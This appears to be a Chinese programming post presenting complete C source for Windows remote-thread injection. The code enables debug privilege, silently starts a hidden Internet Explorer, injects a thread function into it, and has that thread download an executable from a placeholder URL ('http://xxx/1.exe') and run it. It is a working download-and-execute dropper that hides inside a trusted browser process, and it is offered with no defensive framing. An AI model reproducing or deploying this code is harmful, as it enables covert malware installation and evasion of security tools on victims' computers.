这个方法是直接将CreateRemoteThread线程过程函数ThreadProc直接写入到目标进程中,典型的提权->打开进程->在目标进程内申请空间->写入线程代码->CreateRemoteThread启动线程函数
#include <tlhelp32.h>
#include<stdio.h>
#include <urlmon.h>
#pragma comment(lib, "urlmon.lib")
#include <shellapi.h>
typedef struct _RemotePara
{
//下载文件的url
char Url[255];
//保存文件的路径
char FilePath[255];
//URLDownloadToFile函数的地址
DWORD DownAddr;
//WinexeC函数的地址
DWORD ExecAddr;
}RemotePara;
DWORD __stdcall ThreadProc(RemotePara *lpPara)
{
typedef UINT (__stdcall *MWinExec)(LPCSTR lpCmdLine, UINT uCmdShow);
typedef HRESULT (__stdcall *MURLDownloadToFile)(LPUNKNOWN pCaller,
LPCTSTR szURL, LPCTSTR szFileName,
DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB);
MURLDownloadToFile myURLDownloadToFile;
//从结构中得到URLDownloadToFile函数的地址
myURLDownloadToFile=(MURLDownloadToFile)lpPara->DownAddr;
//调用函数下载文件
myURLDownloadToFile(0,lpPara->Url,lpPara->FilePath,0,0);
MWinExec myWinExec;
//从结构中得到WinexeC函数的地址
myWinExec=(MWinExec)lpPara->ExecAddr;
//调用函数运行下载的文件
myWinExec(lpPara->FilePath,1);
return 0;
}
DWORD GetProcessID(char *ProcessName)
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot error");
return 0;
}
BOOL bProcess=Process32First(hProcessSnap,&pe32);
while(bProcess)
{
if(strcmp(strupr(pe32.szExeFile),strupr(ProcessName))==0)
return pe32.th32ProcessID;
bProcess=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken) )
{
printf("OpenProcessToken error\n");
return 1;
}
if(!LookupPrivilegeValue(NULL,name,&luid))
{
printf("LookupPrivilege error!\n");
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) )
{
printf("AdjustTokenPrivileges error!\n");
return 1;
}
return 0;
}
BOOL Inject(const DWORD dwRemoteProcessId)
{
if(EnableDebugPriv(SE_DEBUG_NAME))
{
printf("add privilege error");
return FALSE;
}
HANDLE hWnd=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId);
if (!hWnd)
{
printf("OpenProcess failed");
return FALSE;
}
//申请内存空间
void *pRemoteThread= VirtualAllocEx(hWnd, 0,
1024*4, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (!pRemoteThread)
{
printf("VirtualAllocEx failed");
return FALSE;
}
//把远程函数写入内存
if (!WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,1024*4,0))
{
printf("WriteProcessMemory failed");
return FALSE;
}
//填写RemotePara结构
RemotePara myRemotePara;
ZeroMemory(&myRemotePara,sizeof(RemotePara));
HINSTANCE hurlmon=LoadLibrary("urlmon.dll");
HINSTANCE kernel=LoadLibrary("kernel32.dll");
myRemotePara.DownAddr=(DWORD)GetProcAddress(hurlmon,"URLDownloadToFileA");
myRemotePara.ExecAddr=(DWORD)GetProcAddress(kernel,"WinExec");
char urlfile[255];
strcpy(urlfile,"http://xxx/1.exe");
strcpy(myRemotePara.Url,urlfile);
strcpy(myRemotePara.FilePath,"c:\\a.exe");
//申请内存空间
RemotePara *pRemotePara=(RemotePara *)VirtualAllocEx(hWnd,0,sizeof(RemotePara),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (!pRemotePara)
{
printf("VirtualAllocEx failed");
return FALSE;
}
//写入内存
if (!WriteProcessMemory(hWnd,pRemotePara,&myRemotePara,sizeof(myRemotePara),0))
{
printf("WriteProcessMemory failed");
return FALSE;
}
//建立线程
HANDLE hThread=CreateRemoteThread(hWnd,0,0,(LPTHREAD_START_ROUTINE)pRemoteThread,pRemotePara,0,0);
if (!hThread)
{
printf("CreateRemoteThread failed");
return FALSE;
}
return true;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char Path[255];
GetSystemDirectory(Path,sizeof(Path));
//得到盘符
Path[3]=0x00;
strcat(Path,"Program Files\\Internet Explorer\\iexplore.exe");
WinExec(Path,SW_HIDE);
Sleep(1000);
DWORD Pid=GetProcessID("iexplore.exe");
Inject(Pid);
return 0;
}
